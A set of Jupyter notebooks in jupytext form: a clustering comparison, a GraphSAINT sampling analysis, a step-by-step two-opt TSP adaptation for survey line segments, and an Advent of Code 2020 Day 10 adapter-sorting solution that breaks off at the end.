y='utr_s19', size='UTR_length')) + geom_point(size=0.5, alpha=0.1) + geom_abline(slope=1, intercept=0, size=0.5, color='#586e75') ) # - # ### Clustering # # Now we need a way to split the points the way we want. Let's try a bunch of clustering algorithms from `scikit-learn.` # + jupyter={"outputs_hidden": false} from sklearn.preprocessing import StandardScaler from sklearn.metrics import euclidean_distances from sklearn.neighbors import kneighbors_graph from sklearn import cluster from sklearn import mixture X = df[['utr_s9', 'utr_s9+bcm']].to_numpy() X = StandardScaler().fit_transform(X) bandwidth = cluster.estimate_bandwidth(X, quantile=0.3) connectivity = kneighbors_graph(X, n_neighbors=20) connectivity = 0.05 * (connectivity + connectivity.T) #distances = euclidean_distances(X) gmm = mixture.GaussianMixture(n_components=2, covariance_type='full') ms = cluster.MeanShift(bandwidth=bandwidth, bin_seeding=True) two_means = cluster.MiniBatchKMeans(n_clusters=2, batch_size=200) kmeans = cluster.KMeans(n_clusters=2) ward = cluster.AgglomerativeClustering(n_clusters=2, linkage='ward', connectivity=connectivity) spectral = cluster.SpectralClustering(n_clusters=2, n_neighbors=20, eigen_solver='arpack', affinity='nearest_neighbors') dbscan = cluster.DBSCAN(eps=.5) affinity_propagation = cluster.AffinityPropagation(damping=.95, preference=-200) average_linkage = cluster.AgglomerativeClustering(linkage='average', affinity='cityblock', n_clusters=2, connectivity=connectivity) for name, alg in [ ('MiniBatchKMeans', two_means), ('KMeans', kmeans), ('AffinityPropagation', affinity_propagation), ('MeanShift', ms), ('GMM', gmm), ('SpectralClustering', spectral), ('Ward', ward), ('AgglomerativeClustering', average_linkage), ('DBSCAN', dbscan) ]: alg.fit(X) if hasattr(alg, 'labels_'): df['label'] = alg.labels_.astype(np.int32) else: df['label'] = alg.predict(X) df['label'] = df['label'].astype('category') p = ggplot(df, aes(x='utr_s9', y='utr_s9+bcm', color='label')) \ + geom_point(size=0.5, alpha=0.5) \ + ggtitle(name) \ + geom_abline(slope=1, intercept=0, size=0.5, color='#586e75') print(p) # - X = df.as_matrix
sessions/examples/02 - Python machine learning - clustering.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python (pytorch geometric) # language: python # name: pygeo # --- # # GraphSAINT Analysis # + from imports import * from linkpred import * from dataset import * import matplotlib.pyplot as plt import matplotlib import matplotlib.style as style style.use('seaborn-paper') # %matplotlib inline fontsize = 12 plt.rcParams.update({ 'font.size': fontsize, 'axes.labelsize': fontsize, 'legend.fontsize': fontsize, 'xtick.labelsize': fontsize, 'ytick.labelsize': fontsize, 'axes.titlesize': fontsize }) # - ## set random seeds random.seed(123) np.random.seed(123) torch.manual_seed(123) print(torch.__version__) device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') print('device =', device) # ## Load the Dataset node_attributes = pd.read_csv('data/NDSSL data/raw/node_attributes.csv') node_attributes.head(5) # + plist = np.linspace(0.5, 0.4, 20) density = [] edge_ratio = [] walk_length = 30 batch_size = 1000 num_steps = 10 sample_coverage = 20 for i in range(len(plist)): p = plist[i] print('fraction of data in training set: %.2f' %(1.0 - 2*p)) dataset = load_dataset(dataset_name='NDSSL') data = dataset[0] data = train_test_split_big(data, val_ratio=p, test_ratio=p) data_columns = ['age', 'gender', 'worker', 'relationship', 'household_income', 'household_size', 'zipcode', 'household_vehicles', 'household_workers'] data.x = dataframe2onehot(node_attributes[data_columns], node_attributes) train_data = Data(x=data.x, edge_index=data.train_pos_edge_index, y=data.y) row, col = train_data.edge_index train_data.edge_attr = 1. / degree(col, train_data.num_nodes)[col] # Norm by in-degree. train_loader = GraphSAINTRandomWalkSampler(train_data, batch_size=batch_size, walk_length=walk_length, num_steps=num_steps, sample_coverage=sample_coverage, save_dir=None) density_tmp = [] edge_ratio_tmp = [] for batch in train_loader: n = batch.x.shape[0] m = batch.edge_index.shape[1] density_tmp.append((2*m/(n*(n-1)))) edge_ratio_tmp.append((m/n)) density.append(density_tmp) edge_ratio_tmp.append(edge_ratio_tmp) # - # + fig, ax = plt.subplots(1, 2, figsize=(12, 6)) ax[0].hist(density_train, label='train') ax[0].hist(density_test, label='test') ax[0].legend() ax[1].hist(edge_ratio_train, label='train') ax[1].hist(edge_ratio_test, label='test') ax[1].legend() plt.show()
GraphSAINT Analysis.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + # %matplotlib notebook import numpy as np import matplotlib.pyplot as plt from task_manager_utilities.tsp import two_opt_lines # - # # A TSP Solution for Line Segments # # The problem I'm hoping to solve here is how to most efficiently cover N, 2-point survey lines with a single vessel, and possibly, as a follow-o,n how to most efficiently cover N 2-point survey lines with N vessels. Each line can be traversed in either direction and of course each line is to only be traveresed once. # # It seems likely this problem has already been solved but it is an interestiing one with some fundimental differences from the typical traveling-salesman problems that make it fun to explore and see if we can come up with our own solution to the problem. # # Lets start with the inputs and outputs to the problem. The inputs consist of a starting point, and list of pairs of points for each line, and an ending point. Note however that no direction need be implied for the direction each line is to be traversed. # # The outputs to the problem consist of a route indicating, from the starting point, the sequence of lines and the direction they should be traversed, to minimize the distance traveled. # + # Starting point xs = np.array([0.])[np.newaxis] ys = np.array([4.5])[np.newaxis] # Coordinates for N lines Nlines = 2 x1s = np.arange(Nlines)[np.newaxis].T y1s = np.zeros((Nlines,1)) x2s = np.arange(Nlines)[np.newaxis].T y2s = np.ones((Nlines,1)) # Ending point xe = np.array([4.0])[np.newaxis] ye = np.array([4.0])[np.newaxis] x = np.concatenate((xs,x1s,x2s,xe),axis=0) y = np.concatenate((ys,y1s,y2s,ye),axis=0) def plot_lines(x,y): ''' A method to plot individual lines with start/end points.''' for i in np.arange(1,len(x)-1,2): plt.plot(x[i:i+2],y[i:i+2],linewidth = 3) plt.plot(x,y,'.') plt.plot(x[-1],y[-1],'dr') plt.plot(x[0],y[0],'dg') plt.grid('True') # zip joins x and y coordinates in pairs z = 0 for x1,y1 in zip(x,y): label = "{:d}".format(z) z = z +1 plt.annotate(label, # this is the text (x1,y1), # this is the point to label textcoords="offset points", # how to position the text xytext=(0,10), # distance from text to points (x,y) ha='left') # horizontal alignment can be left, right or center plt.show() plt.figure() plot_lines(x,y) # - # In the code above we created the starting point (green diamond), pairs of points for 4 lines, and and ending point (red diamond). We've concatinated these points into two arrays, x and y, and we can pre-calculate the distances between all pairs of points. This will allow us to lookup and sum "steps" along our route, where a step consists of traversing a line segment and then proceeding to the start of the next. xx, yy = np.meshgrid(x,y) d = np.sqrt( (xx-xx.T)**2 + (yy-yy.T)**2) # This matrix, `d` will prove very useful. The distance from the `i`th point to the `j`th point can be found by indexing into `d` like this: `d[i,j]`. # # Next we need a method that, given a route, calculates the distance along that route. The route we will specify by an array of integers indicating where in the array of points we've created we are to to proceed to next. # # Omitting the starting point for now, consider a move from the point at index 1, along the line formed by the points at index 1 and index 2, and then to the first point in the next line in our route. We will call these two segments, the length of the line to follow, plus the distance from the end of one line to the beginning of the text, a "step". # # To begin lets create an array of indices for all the points in our list. We will use this array to select points we need to consider for each step. r = np.arange(len(x)) # Now lets create a method that, when given the index of the point at which to start, will calculate the distance of a single step. We will pass in everything required to do the calculation too. def stepDistance(start,end,d): # Odd start indices indicate moving forward along the line, while even indicate moving backward. if np.mod(start,2) == 1: # distance of the line plus distance from the end of the line to the start of the next line. dist = d[start,start+1] + d[start+1,end] else: dist = d[start,start-1] + d[start-1,end] return dist # Next we need a method to calculate the entire distance given a route. But first we need to think about what a route means given this setup. If we were working on the traditional TSP problem every point would be considered as part of the route. But in this case some points are the start of a line, and some points are the end of a line and sometimes the line is traversed in one direction and sometimes it is traversed in the opposite direction. So how do we handle that? # # What if we create a new table, that holds distances of steps, where steps may be backward or forward. We'll sort out later how to ensure a step passed in the forward direction is not redundantly also considered in the backward direction. # # Steps in the forward direction for each line will always start on odd indices (index 0 being the starting point for the whole route), and steps in the backward direction for each line will always start on even indices. Remember that each step consists of traversal along the line, (either forward or backward), plus the distance from the end point of the current line to the begining of the next line. # # So, for example, the entry in d[1,3] will be the sum of the length of the line segment from point 1 to point 2, plus the distance from point 2 to point 3, which is the start of our next line. # # We will also include in this table the distance from the starting point of the route (at index 0) to every possible point, since the beginning or ending of any line segment could be specified as the first line to traverse. Similarly we will include the distance from every possible point to the end point of the route, since the end of any line segment could be the final segment in the route and we need the distance from it to the route end. # # + N = d.shape[0] dd = np.empty((N,N)) + np.nan fwd_start_indices = np.argwhere(np.mod(r,2) == 1) bwd_start_indices = np.argwhere(np.mod(r,2) == 0) # Indexing here can be confusing. "fwd_start_indices" should not include the final index # because that includes the end point. for idx in fwd_start_indices[:-1]: # for jdx in np.arange(N)[1:]: # Here we are calculating two things. We are calculating skip the first index and last one, because these points and # are not included in valid "steps" as we've defined them. Then we # also omit when jdx == idx, because this step starts and ends at the same # point. Finally we omit when the end point is just one more than the # start point, because our "step" requires it to be at least 2 points later. # [One point later is just as the end of the current line, but not the start of the next.] # Capture distance from any given point to the end point. if jdx == (N-1): dd[idx,jdx] = d[idx,jdx] # Capture the distance from any point moving along a line in a forward direction. elif jdx != N-1 and jdx != idx and jdx != (idx+1): dd[idx,jdx] = stepDistance(idx,jdx,d) # Capture the length of the line. elif jdx == (idx + 1): dd[idx,jdx] = d[idx,jdx] for idx in bwd_start_indices: for jdx in np.arange(N)[1:]: # Capture the distance from the first point to the start or end of any line. # and the distance from the end of any line to the end point. if idx == 0 or jdx == (N-1): dd[idx,jdx] = d[idx,jdx] # Capture the distance going backward along any line. elif jdx != idx and jdx != (idx-1): #if jdx != N-1 and jdx != idx and jdx != (idx-1): dd[idx,jdx] = stepDistance(idx,jdx,d) # Capture the length of each line (redundant to the forward direction) elif jdx == (idx-1): dd[idx,jdx] = d[idx,jdx] # - # Here is our table of distances for each step, and a plot of the table and the points so we can ensure this is correct. print(dd) # + plt.figure(figsize=(10,5)) plt.subplot(121) plt.imshow(dd) plt.xlabel('jdx') plt.ylabel('idx') plt.title('Distance Matrix for Connecting Lines.') plt.colorbar() plt.axis('equal') plt.axis('tight') plt.subplot(122) plot_lines(x,y) plt.show() # - # Ok, given these results, lets see if it makes any sense. Consider the step that consists of the first line going in the forward direction and ending at the seocnd line, also going in the forward direction. The index for the start of the first line is 1. The index of the start of the second line is 3. So idx = 1 and jdx = 3. The length of the first line is 1, and the distance from the end of the first line to the start of the second line in the forward direction is 1.4, so the value at idx=1, jdx=3 should be 2.4. Inspecting the distance matrix we see it is!. # # Let us check another one. Consider the step that goes from the end of the first line, backwards along the first line to the start of the second line. The index corresponding to the end of the first line is 2, and the index of the start of the second line is 3. So idx = 2, and jdx =3. The distance backward along the first line is 1 and the distance from the beginning of the first line to the beginning of the second line is 1, so the sum is 2. And indeed the box at idx=2,jdx=3 is 2. # # Great! Now we have a way to calculate the lengh of any step along the route, where a step consists of traversing a line in some direction and then transiting from the line to the beginning of the next line. # # Let us capture this in a function for easy use later. def generate_distance_table_for_lines(x,y): ''' Generate a distance table from a list of coordinates for a start point, a series of lines, and an end point. idx/jdx: 0 1 2 3 4 5 x = [xs p1x1 p1x2 p2x1 p2x2 xe] y = [ys p1y1 p1y2 p2y1 p2y2 ye] Where (xs,ys) is the starting point. (p1x1,p1y1) -- (p1x2,p1y2) are two points that define the first line segment. (p2x1,p2y1) -- (p2x2,p2y2) are two points the define the second line segment. Additional line segmenets are specified in the same way. (xe,ye) is the ending point. The table is indexed by the starting point of one line, idx, and the starting point of a subsequent line, jdx. The table value at dd[idx,jdx] is the sum of the length of the line starting at idx, and the distance from the end of the line starting at idx to the start of the line specified by jdx. Note that when idx is odd, this implies the line is traversed in the forward direction, meaning that the "end" of the line is specified by the point at idx+1. Similarly when idx is even, this implies the line is traversed in the backward direction, meaning that the "end" of the line is specified by the point at idx -1. The table also provides the length of each line, which can be obtained by specifying indices for the points at either end. For example, dd[1,2] will provide he length of the first line. Finally, the table also holds the distance from the starting point to either end of every line, and similarly from the ending point to either end of every line. These are indexed with dd[0,i] and dd[i,N-1], where i is the index to/from the desired point and N is the number of points. ''' # First calculate the distance between all pairs of points xx, yy = np.meshgrid(x,y) d = np.sqrt( (xx-xx.T)**2 + (yy-yy.T)**2) #print(d) N = d.shape[0] # Initalize the result. dd = np.empty((N,N)) + np.nan # Get indices for steps that go in the forward direction of each line # and those that go in the backward direction too. r = np.arange(len(x)) fwd_start_indices = np.argwhere(np.mod(r,2) == 1) bwd_start_indices = np.argwhere(np.mod(r,2) == 0) #print(fwd_start_indices) #print(bwd_start_indices) # Indexing here can be confusing. "fwd_start_indices" should not include the final index # because that includes the end point. for idx in fwd_start_indices[:-1]: # for jdx in np.arange(N)[1:]: # Here we are calculating two things. We are calculating skip the first index and last one, because these points and # are not included in valid "steps" as we've defined them. Then we # also omit when jdx == idx, because this step starts and ends at the same # point. Finally we omit when the end point is just one more than the # start point, because our "step" requires it to be at least 2 points later. # [One point later is just as the end of the current line, but not the start of the next.] # Capture distance from any given point to the end point. if jdx == (N-1): dd[idx,jdx] = d[idx,jdx] # Capture the distance from any point moving along a line in a forward direction. elif jdx != N-1 and jdx != idx and jdx != (idx+1): dd[idx,jdx] = stepDistance(idx,jdx,d) # Capture the length of the line. elif jdx == (idx + 1): dd[idx,jdx] = d[idx,jdx] for idx in bwd_start_indices: for jdx in np.arange(N)[1:]: # Capture the distance from the first point to the start or end of any line. # and the distance from the end of any line to the end point. if idx == 0 or jdx == (N-1): dd[idx,jdx] = d[idx,jdx] # Capture the distance going backward along any line. elif jdx != idx and jdx != (idx-1): #if jdx != N-1 and jdx != idx and jdx != (idx-1): dd[idx,jdx] = stepDistance(idx,jdx,d) # Capture the length of each line (redundant to the forward direction) elif jdx == (idx-1): dd[idx,jdx] = d[idx,jdx] return dd # The next step is to create a funcion to calculate the length of an entire route. A route will be speciifed as a sequence of steps. When a step begins on an odd index it indicates we will traverse the line in the forward direction and when it begins on an even index it indicates we will travers the line in the backward direction. # # How we generate the route requires more discussion, but for now lets generate one synthetically. Every route will start with the index of the starting point at index 0, and end with the ending point (N-1). Indices indicating the sequence of steps will fall between. route = np.array([0, 1, 3, 2*Nlines+1]) # Calculation of the distance along the route is a little trick and so we'll do it step-wise. We first start with the distance from the starting point to the start of the first line. Next we add the distance of each "step" where, again, a step is the length of the line plus the distance to the next line and these are added up for all full "steps" we can take. This leaves the length of the last and the distance from which ever end of the last line we ended on to the end of the route. This is captured in `routeDistance` below using the table of distances created above. def routeDistance(route,dd): # First point to start of first line. dist = dd[route[0],route[1]] # Steps consisting the length of each line plus transit to the next, ending at the beginning of the last line. dist += np.sum(dd[route[1:-2],route[2:-1]]) # For forward going lines (odd indices) # add the length of the last line plus the distance # from the end of the last line to the end point. if np.mod(route[-2],2) == 1: dist += dd[route[-2],route[-2]+1] dist += dd[route[-2]+1, route[-1]] # for backward going lines (even indices) # add the length of the last line plus the # distance to the end point. else: dist += dd[route[-2],[route[-2]-1]] dist += dd[route[-2]-1,route[-1]] return dist # Now lets check this calculation with a our example route and maybe a few others. Our example route passes along each of the two lines in the forward direction. It is the route shown in the plot above. The distance from the start point to the start of the first line is 4.5. The distance along the first line is 1. The distance from the end of the first line to the start of the second is about 1.4. The distance along the second line is 1, and finally the distance from the end of the second line to the end point is about `3*1.4`. Adding these up gives the same result! rd = routeDistance(route,dd) print(rd) print(4.5 + 1 + 1.4 + 1 + 3*1.4) # Ok, now lets create another route and check that one too. This time we'll go forward along the first line, but backward along the second line. route = np.array([0,1,4,2*Nlines+1]) print(route) rd = routeDistance(route,dd) print(rd) # Checking this one, the distance from the start to the starting point is 4.5. The length of the first line is 1.0 The distance from the end of the first line to the end of the second line (since we're traversing it backward) is 1, the length of the second line is 1 and, finally, the distance from the beginning of the second line to the end point is `sqrt( (4-1)**2 + (4-0)**2)`. This gives: print(4.5 + 1.+ 1. + 1. + np.sqrt( (4-1)**2 + (4-0)**2)) # Great! Ok so now on to how we generate routes. # # First we consider the properties of a valid route. A valid route must start with the starting point and end with the ending point, that much is clear. # # It is useful to remember a forward step along a line is indicated by an index in the route with an odd index while a backward step along a line is indicated by an even index. # # A forward step's destination cannot be the end of its own line, so a valid route cannot have two sequential indices in which the first, `i`, is odd and the second is `i + 1`. Similarly, a backward step's destination cannot be the beginning of its own line, so a valid route cannot have two sequential indices in which the first index, `i` is even and the second is `i-1`. # # We also have to remember that we only want to traverse a given line once. So if we've traversed a line forward fronm index, `i`, we don't want to subsequently travese the same line backward from `i+1`. # # As a check, one can note that the number of indices in the final route should be the number of lines, `Nlines` + 2. # # The strategy I will take is to first start with a random array of indices for each point in each line (that is indices for all points omitting the start point and the end point). We'll call this array rc for "candidate route". cr = np.random.permutation(np.arange(len(x)-2))+1 print(cr) # Next I'm going to build a valid route by seeding an empty list with the first point in my candidate route, and then step through the candidate route noting which indices are invalid because of previously selected points. As mentioned above, these will be the next point in lines we are traversing in the forward direction and the previous point for lines we are traversing in the reverse direction. # # Finally one can assemble the final route by concatinating indies for the first point and last point to this new route. # + r = [cr[0]] if np.mod(cr[0],2)==1: invalid_indices = [cr[0] + 1] else: invalid_indices = [cr[0]-1] for idx in np.arange(len(cr)): # Forward steps. if (idx != 0 and np.mod(cr[idx],2) == 1) and cr[idx] not in invalid_indices: r.append(cr[idx]) # End of its own line. invalid_indices.append(cr[idx]+1) # backward steps elif (idx != 0 and idx != (len(cr)-1) and np.mod(cr[idx],2) == 0) and cr[idx] not in invalid_indices: r.append(cr[idx]) # Beginning of its own line. invalid_indices.append(cr[idx]-1) print(r) print(invalid_indices) route = [0] + r + [len(cr) + 1] print("route:") print(route) # - # One can plot the route and verify that it looks asit one expects. To do this we generate a method to correctly index the end-points of each line in the order specified by the route, inserting the ends of lines as appropriate. # + def route_by_points(route): ''' Generate the full route by inserting indices for the missing points for each line. ''' ii = [] for idx in route: ii.append(idx) if np.mod(idx,2) == 1 and idx != route[-1]: ii.append(idx+1) else: if idx != 0 and idx != route[-1]: ii.append(idx-1) return ii ii = route_by_points(route) print(ii) def plot_route(ii,x,y): plt.plot(x[ii],y[ii],':k') plt.plot(x[0],y[0],'dg') plt.plot(x[-1],y[-1],'dr') plt.grid('True') plt.show() # - route_pts = route_by_points(route) plt.figure() plot_lines(x,y) plot_route(route_pts,x,y) # The route valididation procedure above should be condensed into a method. Let us do that now: def generate_valid_route(cr): ''' Given a candidate route of return a valid route connecting lines.''' r = [cr[0]] ''' if np.mod(cr[0],2)==1: invalid_indices = [cr[0] + 1] else: invalid_indices = [cr[0]-1] ''' invalid_indices = [] for idx in np.arange(len(cr)): # Forward steps. if (idx != 0 and idx != len(cr)-1 and np.mod(cr[idx],2) == 1 and cr[idx] not in invalid_indices): r.append(cr[idx]) # End of its own line. invalid_indices.append(cr[idx]+1) # backward steps elif (idx != 0 and idx != (len(cr)-1) and np.mod(cr[idx],2) == 0 and cr[idx] not in invalid_indices): r.append(cr[idx]) # Beginning of its own line. invalid_indices.append(cr[idx]-1) r = [x for x in r if x not in invalid_indices] # Concatinate route and end point. route = r + [len(cr)-1] return route # The next task is to modify a classic TSP algorithm, "two-opt" to find solutions for lines rather than points using our work thus far. Here is the algorithm for points from which we'll make modifications. This method is modified from a [stack-overflow](https://stackoverflow.com/questions/25585401/travelling-salesman-in-scipy) post implementing the classic two_opt algorithm. # # We should be mindful that the two_opt algorithm is not guaranteed to give the optimal solution, and that there are many other approximate TSP solutions in the literature. # # Calculate the euclidian distance in n-space of the route r traversing cities c, ending at the path start. # #path_distance = lambda r,c: np.sum([np.linalg.norm(c[r[p]]-c[r[p-1]]) for p in range(len(r))]) # # Reverse the order of all elements from element i to element k in array r. # two_opt_swap = lambda r,i,k: np.concatenate((r[0:i],r[k:-len(r)+i-1:-1],r[k+1:len(r)])) # # # def two_opt(xs,ys,improvement_threshold): # 2-opt Algorithm adapted from https://en.wikipedia.org/wiki/2-opt # # #xx = [p.position.x for p in cities] # #yy = [p.position.y for p in cities] # # xx, yy = np.meshgrid(xs,ys) # dd = np.sqrt( (xx-xx.T)**2 + (yy-yy.T)**2) # # #print(dd) # # route = np.arange(dd.shape[0]) # Make an array of row numbers corresponding to cities. # improvement_factor = 1 # Initialize the improvement factor. # #best_distance = path_distance(route,cities) # Calculate the distance of the initial path. # best_distance = np.sum(dd[route[:-1],route[1:]]) # # # while improvement_factor > improvement_threshold: # If the route is still improving, keep going! # # distance_to_beat = best_distance # Record the distance at the beginning of the loop. # # for swap_first in range(1,len(route)-2): # From each city except the first and last, # # for swap_last in range(swap_first+1,len(route)): # to each of the cities following, # # new_route = two_opt_swap(route,swap_first,swap_last) # try reversing the order of these cities # #print(new_route) # #new_distance = path_distance(new_route,cities) # and check the total distance with this modification. # new_distance = np.sum(dd[new_route[:-1],new_route[1:]]) # # #print("%0.3f, %0.3f" % (new_distance, best_distance)) # if new_distance < best_distance: # If the path distance is an improvement, # route = new_route # make this the accepted best route # best_distance = new_distance # and update the distance corresponding to this route. # improvement_factor = 1 - best_distance/distance_to_beat # Calculate how much the route has improved. # # print("d:%0.3f, if: %0.3f" % (best_distance,improvement_factor)) # # return route # When the route is no longer improving substantially, stop searching and return the route. # Here is the further modified two_opt function, `two_opt_lines`, to solve our line-segment TSP problem. # # The method first pre-calculates the table of distances for steps along the route. # # The route under consideration is represented in two ways - as a "route" which is a series of indices where each index represents a "step", as we've defined it above, and as a "point_route" which includes the points omitted by the step-wise representation, namely, the end points of each line-segment. The reason for these two reprentations will be made clear momentarily. # # The basic strategy of two-opt swap algorithm is to reverse the order of a subset of of the existing route, and testing the distance against the best route identified thus far. By reversing the order, one effectively "unwraps" crossing portions of the route, producing a new route that is more direct. The lambda function `two_opt_wap` does this permutation. # # Permuations of a route must occur on the point-wise representation of the route because the step-wise representation only contains the starting points of each line. Ending points must be considered because they indicate traversal of the line in the reverse direction. # # Once a permutation is calculated from the point-wise representation, the resulting route may be invalid. Invalid routes occur when, for example, a line-segment's two points are no longer adjacent to each other. Our method `generate_valid_route` will produce a valid step-wise route given the new permutation in the point-wise representation. # # The step-wise representation of the route is passed to `routeDistance()` to return the length of that candidate route. # # The process of systematically permuting the route and testing its length against our best length is continued until the desired improvement threshold is reached. # # >NOTE: Our solution below contains some debugging print statements that can be removed in a final solutoin. # # + # Calculate the euclidian distance in n-space of the route r traversing cities c, ending at the path start. #path_distance = lambda r,c: np.sum([np.linalg.norm(c[r[p]]-c[r[p-1]]) for p in range(len(r))]) # Reverse the order of all elements from element i to element k in array r. two_opt_swap = lambda r,i,k: np.concatenate((r[0:i],r[k:-len(r)+i-1:-1],r[k+1:len(r)])) def two_opt_lines(xs,ys,improvement_threshold): # 2-opt Algorithm adapted from https://en.wikipedia.org/wiki/2-opt dd = generate_distance_table_for_lines(xs,ys) # Generate a candidate route from the individual points. point_route = np.arange(len(xs)) # Make sure the route is valid, in part, by dropping implied points. route = generate_valid_route(point_route) improvement_factor = 1 # Initialize the improvement factor. best_distance = routeDistance(route,dd) print(route) print("Initial Distance: %0.2f" % best_distance) # Begin the search. while improvement_factor > improvement_threshold: # If the route is still improving, keep going! distance_to_beat = best_distance # Record the distance at the beginning of the loop. for swap_first in range(1,len(point_route)-2): # From each point except the first and last, for swap_last in range(swap_first+1,len(point_route)-1): # to each of the points following, # try reversing the order of these points. # Note, when two indices are non-sequential, this will reverse the # order of the lines. When two indices are sequential, it will reverse # the direction of the line. new_candidate_point_route = two_opt_swap(point_route,swap_first,swap_last) # Our candidate route will likely not be valid. It will specify a point at the # end of one line without specifying its pair at the other end of the line next. # generate_valid_route will enforce this. # NOTE: This step may be controversial, because in dropping invalid points # I may be making some permutations unattainable. It may be impossible to "swap" # my way to some portions of the search area. Need to think about this more. new_route = generate_valid_route(new_candidate_point_route) # generate_valid_route will return a condensed route, only specifying the start # of each line to traverse. This is used in our function to calculate the route # length. But subsequent permutations require the full list of points to traverse, # which is provided from the cendensed route by route_by_points. new_point_route = route_by_points(new_route) # and check the total distance with this modification. new_distance = routeDistance(new_route,dd) print("new route %0.2f:" % new_distance) print(new_route) if new_distance < best_distance: # If the path distance is an improvement, point_route = new_point_route # make this the accepted best route best_distance = new_distance # and update the distance corresponding to this route. print("New best route: %0.2f" % new_distance) print(new_route) improvement_factor = 1 - best_distance/distance_to_beat # Calculate how much the route has improved. print("Dist: %0.3f, improvement factor: %0.3f" % (best_distance,improvement_factor)) print(new_route) route = generate_valid_route(point_route) return route # When the route is no longer improving substantially, stop searching and return the route. # - # Now lets test our solution. We'll generate 20 random points. The first point will be our starting point, and our final point will be our ending point and the 18 points will designate 9 lines that we are to traverse, in any order. # + np.random.seed(13) x = np.random.random((20,1))*100 y = np.random.random((20,1))*100 plt.figure() plot_lines(x,y) # - ii = two_opt_lines(x,y,.01) # Before we inspect our result, lets look at the output above and see what's happening. The first route consists of the odd indices from our list of input points, which means we are to traverse the lines in the order they were specified, and because all indicies are odd, all alines are to be traversed in the forward direction. # # [0, 1, 3, 5, 7, 9, 11, 13, 15, 17, 19] # Initial Distance: 1239.41 # # This is our new route after the first pemutation and its length, which is worse than our initial route, so it is not retained. The index at location 1 has switched from "1" to "2". This means tha route is identical to the previous one, but the first line is traversed in the backward direction.: # # new route 1251.16: # [0, 2, 3, 5, 7, 9, 11, 13, 15, 17, 19] # # The next route does improve on our initial route. The indexes at locations 1 and 2 ("3" and "2" respectively) have been swapped. Now the second line segment is being traversed prior to the first line segment and, as before, the first line segment is being traversed backward. This new route is identified as a new best route and we print it out again for emphasis: # # new route 1112.86: # [0, 3, 2, 5, 7, 9, 11, 13, 15, 17, 19] # New best route: 1112.86 # [0, 3, 2, 5, 7, 9, 11, 13, 15, 17, 19] # # The process of permuting the route continues until the improvement threshold drops below the specified value. # # Lets now plot up the most optimal route we've found thus far. iii = route_by_points(ii) plt.figure() plot_route(iii,x,y) plot_lines(x,y) ii iii
TSP_Testing.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Day 10 - Sorting adapters # # * https://adventofcode.com/2020/day/10 # # <NAME> is trying to trick us again with a convoluted description; all we have to do is *sort* the adapters. That's because, to be able to use all adapters, can only put any given adapter between adapters that are lower on the one end, and higher on the other. # # Once sorted, we can keep a count of their differences; a `Counter()` can do that just fine. # # To keep track of the preceding adapter (to calculate the jolt differential), I used the `pairwise` recipe from the [`itertools` recipes section](https://docs.python.org/3/library/itertools.html#itertools-recipes); that's a fixed window iterator, really. # + from collections import Counter from collections.abc import Sequence from itertools import chain, tee def pairwise(iterable): "s -> (s0,s1), (s1,s2), (s2, s3), ..." a, b = tee(iterable) next(b, None) return zip(a, b) def parse_adapters(input_: str) -> Sequence[int]: return [int(v) for v in input_.split()] def all_adapters(adapters: Sequence[int]) -> int: # (0, adapter1), (adapter1, adapter2), ... paired = pairwise(chain([0], sorted(adapters))) differences = Counter(adapter - prev for prev, adapter in paired) return differences[1] * (differences[3] + 1) # the device itself counts too tests = { "16 10 15 5 1 11 7 19 6 12 4": 7 * 5, ( "28 33 18 42 31 14 46 20 48 47 24 23 49 45 " "19 38 39 11 1 32 25 35 8 17 7 9 4 2 34 10 3" ): 22 * 10, } for test, expected in tests.items(): assert all_adapters(parse_adapters(test)) == expected # - import aocd adapters = parse_adapters(aocd.get_data(day=10, year=2020)) print("Part 1:", all_adapters(adapters)) # ## Part 2 - Calculating the number of combinations. # # Finally, we are entering more advanced territories in this years AoC. To calculate the number of combinations, there are two approaches we can take: # # - Recursion, the number of combinations of a given adapter with jolt level *J*, is the sum of all adapters with jolt levels *J + 1*, *J + 2* and *J + 3* that exist. Eventually you'll reach the last adapter (your device), so you reach the base case with a value of `1`. You'd be smart to use memoization there, as those *J + 2 and *J + 3* adapters are often also reachable from the *J + 1* and *J + 2* positions, you wouldn't want to have to calculate those numbers again! # # The disadvantage here is that we need, even with memoization, `len(adapters)` spaces in our cache to reach the end and so finally sum up the total number of combinations. And while you could unroll the recursion and use an explicit stack instead of the call stack to track you progress, that's still a lot of work. # # - Inverting the calculation, and use *dynamic programming*. If the number of combinations for an adapter of jolt level *J* depends on the values for the adapters of *J* + 1, *J* + 2 and *J* + 3, could we first calculate the number of combinations for the *last* 3 adapters in the chain, and work our way back from there? That way we would only need enough memory to remember the number of combinations of 3 adapters, at most, throughout! # # Note that the puzzle explicitly tells us that the last element, your device, is *always* at *J + 3* from the adapter before it. So the _base case_ here is that for the one-but-last adapter the number of combinations is never more than 1 *either* (it can only connect directly to your device), and the adapter at the second-last position, there is *also* just one option, you can't skip the one-but-last adapter. # # To implement the latter option, I chose a `deque` to represent the number of combinations you can make with adapters (if they exist), at jolt levels `+1`, `+2` and `+3`, and then just prepend the value for our adapter to that point, and rotate in zeros to the start depending on how many jolt levels need to be skipped to reach the next last adapter. Because the `deque` is configured to only hold 3 values, rotating in zeros neatly drops off values from the end as adapters at higher jolt levels disappear from consideration: # + from collections import deque def calc_combinations(adapters: Sequence[int]) -> int: # start with [1], and max() + 3, to represent the device at the end combos = deque([1], maxlen=3) next_ = max(adapters) + 3 # (device, adapters[-1]), (adapters[-1], adapters[-2]), ... with_next = pairwise(chain([next_], sorted(adapters, reverse=True))) for next_, adapter in with_next: combos.extendleft([0] * (next_ - adapter - 1)) # automatically drops values on the opposite end combos.appendleft(sum(combos)) # add up all combinations of adapters we can reach return sum(combos) tests = { "16 10 15 5 1 11 7 19 6 12 4": 8, ( "28 33 18 42 31 14 46 20 48 47 24 23 49 45 " "19 38 39 11 1 32 25 35 8 17 7 9 4 2 34 10 3" ): 19208, } for test, expected in tests.items(): assert calc_combinations(parse_adapters(test)) == expected # - print("Part 2:", 